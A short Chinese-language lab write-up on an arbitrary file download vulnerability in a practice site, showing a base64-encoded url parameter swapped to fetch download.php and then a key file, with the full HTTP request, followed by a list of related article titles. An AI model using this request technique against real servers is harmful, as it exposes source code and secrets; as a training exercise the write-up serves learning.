檔案下載漏洞練習(一)
(1)開啟網頁
(2)同樣的先抓下包
我們注意到:
url=Y2hvdWJhZ3VhaS5tcDM 還有/download.php
先解碼看看是什麼
是個檔名
(3)我們試著將其替換成、download.php
GET /download.php?url=ZG93bmxvYWQucGhw= HTTP/1.1
Host: e2ad76b4d4b6d6ed.yunyansec.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://e2ad76b4d4b6d6ed.yunyansec.com/
Accept-Language: zh-CN,zh;q=0.9
Connection: close(4)檔案下載成功,開啟後發現還可以有hereiskey.php下載
同樣先編碼
得到key
本文轉自Alyoyojie 51CTO部落格,原文連結:http://blog.51cto.com/antivirusjo/2059595,如需轉載請自行聯絡原作者
相關文章
- phpcms的phpcms_auth導致的任意變數覆蓋漏洞、本地檔案包含漏洞和任意檔案下載漏洞PHP變數
- ShopexV4.8.4|V4.8.5下載任意檔案漏洞
- 檔案下載
- 從ftp上傳下載檔案(一)FTP
- 00、下載檔案
- Ajax 下載檔案
- FastApi下載檔案ASTAPI
- MVC 下載檔案MVC
- js 檔案下載JS
- Servlet下載檔案Servlet
- httpWebRequest 檔案下載HTTPWeb
- php檔案下載PHP
- .net 檔案下載
- php 檔案下載PHP
- HttpClient 下載檔案HTTPclient
- Response下載檔案
- 任意檔案下載漏洞的介面URL構造分析與討論
- 檔案程式設計、檔案下載程式設計
- python 檔案讀寫練習Python
- iOS開發網路篇之檔案下載、大檔案下載、斷點下載iOS斷點
- Android下載檔案(一)下載進度&斷點續傳Android斷點
- Flutter 下載檔案操作Flutter
- SpringMVC檔案下載SpringMVC
- 【springmvc】下載檔案SpringMVC
- 使用PHP下載檔案PHP
- 檔案下載相關
- ftp下載指定檔案FTP
- C#檔案下載C#
- PHP檔案下載原理PHP
- 檔案上傳下載
- 不好的程式設計習慣之檔案下載程式設計
- 實戰篇——檔案包含漏洞一
- windows下ftp定時執行批次下載檔案,windows下ftp定時執行批次下載檔案的一種方法WindowsFTP
- SpringMVC檔案上傳下載(單檔案、多檔案)SpringMVC
- 解析漏洞與檔案上傳漏洞—一對好兄弟
- java上傳檔案跟批量下載檔案Java
- 利用secure crt下傳下載檔案
- 如何下載 Ubuntu 映象檔案?Ubuntu